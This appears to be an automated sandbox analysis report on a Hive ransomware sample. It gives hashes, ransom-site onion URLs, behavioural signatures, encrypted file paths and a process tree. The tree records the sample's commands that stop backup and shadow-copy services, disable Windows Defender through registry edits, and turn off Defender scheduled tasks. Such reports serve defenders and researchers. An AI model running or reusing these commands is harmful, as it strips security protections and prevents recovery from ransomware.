Analysis
max time kernel: 193s
max time network: 196s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 16:26
Static task: static1
Behavioral task: behavioral1
Sample: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
Resource: win7-en-20211208
General
Target: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
Size: 3.8MB
MD5: 32bd8e6843879a761e6fa9436a90bb66
SHA1: 26dde522d6f3f87ac982495028494c7f50799696
SHA256: 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
SHA512: c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f
Malware Config
Extracted from: C:\Program Files\7-Zip\rFSH_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses mpcmdrun utility to delete all AV definitions.
Processes:
  pid 4088  MpCmdRun.exe

Hive
A ransomware written in Golang first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes:
  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"  (reg.exe)
Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
  pid 1852  bcdedit.exe
  pid 4072  bcdedit.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in Program Files directory (64 IoCs)
Processes (the process for every entry below is 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe):
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\MEDIA\DRUMROLL.WAV.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_OgAAADoAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookMedTile.scale-100.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\OneConnectWideTile.scale-125.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-200.png
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\ui-strings.js.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconOpenInRefocus.contrast-white_scale-100.png
  File opened for modification  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.scale-125.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Eye.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleMedTile.scale-200.png
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_LAAAACwAAAA0.bvddx
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_GAAAABgAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\lipssealed.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\WideTile.scale-200.png
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\offsymxl.ttf
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Microsoft.People.Relevance.winmd
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_12s.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\18.rsrc
  File opened for modification  C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_LAAAACwAAAA0.bvddx
  File created                  C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-RS\rFSH_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\7-Zip\Lang\lv.txt.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp4-ul-phn.xrm-ms.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\3838_48x48x32.png
  File opened for modification  C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\TabTip32.exe.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPage\silverIcon.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\Sounds\Camcorder_stop_5.wav
  File opened for modification  C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_GAAAABgAAAA0.bvddx
  File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\WideTile.scale-200.png
  File created                  C:\Program Files\Microsoft Office\root\Office16\MSIPC\kk\rFSH_HOW_TO_DECRYPT.txt
  File created                  C:\Program Files\Microsoft Office\root\Office16\PROOF\rFSH_HOW_TO_DECRYPT.txt
  File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\rFSH_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\SmallTile.scale-200.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-64.png
  File opened for modification  C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcor.dll.mui
  File created                  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\rFSH_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_EgAAABIAAAA0.bvddx
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-oob.xrm-ms.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Wide310x150\PaintWideTile.scale-100.png
  File opened for modification  C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy.jar.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\Interceptor.tlb.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_KAAAACgAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-48_altform-unplated.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\daily_challenge.jpg
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerMedTile.contrast-black_scale-125.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-white\MusicStoreLogo.scale-150_contrast-white.png
  File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\rFSH_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\29.jpg
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\MedTile.scale-100.png
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_PAAAADwAAAA0.bvddx
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\ui-strings.js.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File created                  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\rFSH_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-16_altform-unplated.png
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_GgAAABoAAAA0.bvddx
  File opened for modification  C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\MedTile.scale-100.png
  File opened for modification  C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotMatch.snippets.ps1xml
  File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_HgAAAB4AAAA0.bvddx
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid 1972  vssadmin.exe

Modifies registry class (3 IoCs)
Processes:
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP  (reg.exe)
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP  (reg.exe)
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP  (reg.exe)

Opens file in notepad (likely ransom note) (1 IoC)
Processes:
  pid 1196  notepad.exe

Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
  pid 3044  powershell.exe
  pid 3044  powershell.exe
  pid 3044  powershell.exe
  pid 2952  powershell.exe
  pid 2952  powershell.exe
  pid 2952  powershell.exe
  pid 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
  pid 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (tokens adjusted, per pid):
  pid 4040  wevtutil.exe  Token: SeSecurityPrivilege, SeBackupPrivilege
  pid 2956  wevtutil.exe  Token: SeSecurityPrivilege, SeBackupPrivilege
  pid 3944  wevtutil.exe  Token: SeSecurityPrivilege, SeBackupPrivilege
  pid 4076  wmic.exe      Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 3596  wmic.exe      Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 3596  wmic.exe      Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source pid, source process, target pid, target process; every write below is logged twice in the report):
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 1332  net.exe
  PID 1332  net.exe  wrote to memory of  PID 4084  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 4080  net.exe
  PID 4080  net.exe  wrote to memory of  PID 2000  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 1800  net.exe
  PID 1800  net.exe  wrote to memory of  PID 2712  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 1548  net.exe
  PID 1548  net.exe  wrote to memory of  PID 2720  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 1176  net.exe
  PID 1176  net.exe  wrote to memory of  PID 2196  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 440   net.exe
  PID 440   net.exe  wrote to memory of  PID 3484  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 1412  net.exe
  PID 1412  net.exe  wrote to memory of  PID 1752  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 2736  net.exe
  PID 2736  net.exe  wrote to memory of  PID 1892  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 2600  net.exe
  PID 2600  net.exe  wrote to memory of  PID 3828  net1.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 3776  sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 3724  sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 884   sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 3860  sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 960   sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 2064  sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 2440  sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 1512  sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 1736  sc.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 2008  reg.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 2176  reg.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 2388  reg.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 832   reg.exe
  PID 3068  87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe  wrote to memory of  PID 3948  reg.exe
Processes
(process tree; indentation shows the parent/child depth, "cmd:" is the recorded command line, signatures matched on that process follow as bullets)

PID 3068  C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  PID 1332  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    PID 4084  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SamSs" /y
  PID 4080  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    PID 2000  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
  PID 1800  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    PID 2712  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
  PID 1548  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    PID 2720  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
  PID 1176  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "vmicvss" /y
      - Suspicious use of WriteProcessMemory
    PID 2196  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "vmicvss" /y
  PID 440   C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    PID 3484  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "VSS" /y
  PID 1412  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    PID 1752  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "wbengine" /y
  PID 2736  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    PID 1892  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "WebClient" /y
  PID 2600  C:\Windows\SYSTEM32\net.exe
      cmd: net.exe stop "UnistoreSvc_12cdb" /y
      - Suspicious use of WriteProcessMemory
    PID 3828  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 stop "UnistoreSvc_12cdb" /y
  PID 3776  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SamSs" start= disabled
  PID 3724  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SDRSVC" start= disabled
  PID 884   C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "SstpSvc" start= disabled
  PID 3860  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "UI0Detect" start= disabled
  PID 960   C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "vmicvss" start= disabled
  PID 2064  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "VSS" start= disabled
  PID 2440  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "wbengine" start= disabled
  PID 1512  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "WebClient" start= disabled
  PID 1736  C:\Windows\SYSTEM32\sc.exe
      cmd: sc.exe config "UnistoreSvc_12cdb" start= disabled
  PID 2008  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  PID 2176  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  PID 2388  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  PID 832   C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  PID 3948  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  PID 3740  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  PID 980   C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  PID 1796  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  PID 1692  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  PID 3980  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  PID 2560  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  PID 3184  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  PID 1984  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  PID 364   C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  PID 2712  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  PID 1184  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  PID 1256  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  PID 1088  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  PID 1328  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  PID 1288  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  PID 3836  C:\Windows\SYSTEM32\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  PID 1096  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  PID 616   C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  PID 3088  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  PID (not captured)  C:\Windows\SYSTEM32\reg.exe
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- Modifies registry class
PID:388 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:844 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
